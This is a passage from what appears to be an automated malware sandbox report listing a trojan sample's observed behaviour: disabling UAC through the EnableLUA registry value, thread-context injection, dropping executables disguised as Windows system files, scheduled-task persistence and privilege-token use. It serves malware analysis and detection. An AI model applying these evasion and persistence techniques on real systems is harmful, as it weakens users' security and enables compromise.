N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default\Pictures\SppExtComObj.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4600 set thread context of 3076 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 5004 set thread context of 1980 N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe
PID 5596 set thread context of 5668 N/A C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe
PID 6128 set thread context of 1812 N/A C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe
PID 5168 set thread context of 2104 N/A C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe
PID 3108 set thread context of 2012 N/A C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe
PID 4264 set thread context of 5504 N/A C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe
PID 5804 set thread context of 5944 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe
PID 3668 set thread context of 5064 N/A C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe
PID 2232 set thread context of 4444 N/A C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe
PID 3616 set thread context of 2892 N/A C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe
PID 5400 set thread context of 5404 N/A C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Portable Devices\sihost.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\VideoLAN\Idle.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\RCX8B1B.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Media Player\es-ES\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Media Player\es-ES\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\66fc9ff0ee96c2 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\dotnet\shared\OfficeClickToRun.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\dotnet\shared\e6c9b481da804f C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Multimedia Platform\9e8d7a4ca61bd9 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\sihost.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Media Player\es-ES\RCX8FB2.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Multimedia Platform\RCX9A08.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Media Player\es-ES\e15c75ee0b3582 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\VideoLAN\6ccacd8608530f C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\dotnet\shared\RCX93DB.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\dotnet\shared\OfficeClickToRun.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\VideoLAN\RCX95EF.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\VideoLAN\Idle.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\PLA\RCX97F3.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Windows\PLA\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Windows\DigitalLocker\en-US\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Windows\DigitalLocker\en-US\csrss.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Windows\servicing\ja-JP\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Windows\PLA\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Windows\PLA\9e8d7a4ca61bd9 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Windows\OCR\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Windows\DigitalLocker\en-US\csrss.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Default\Pictures\SppExtComObj.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
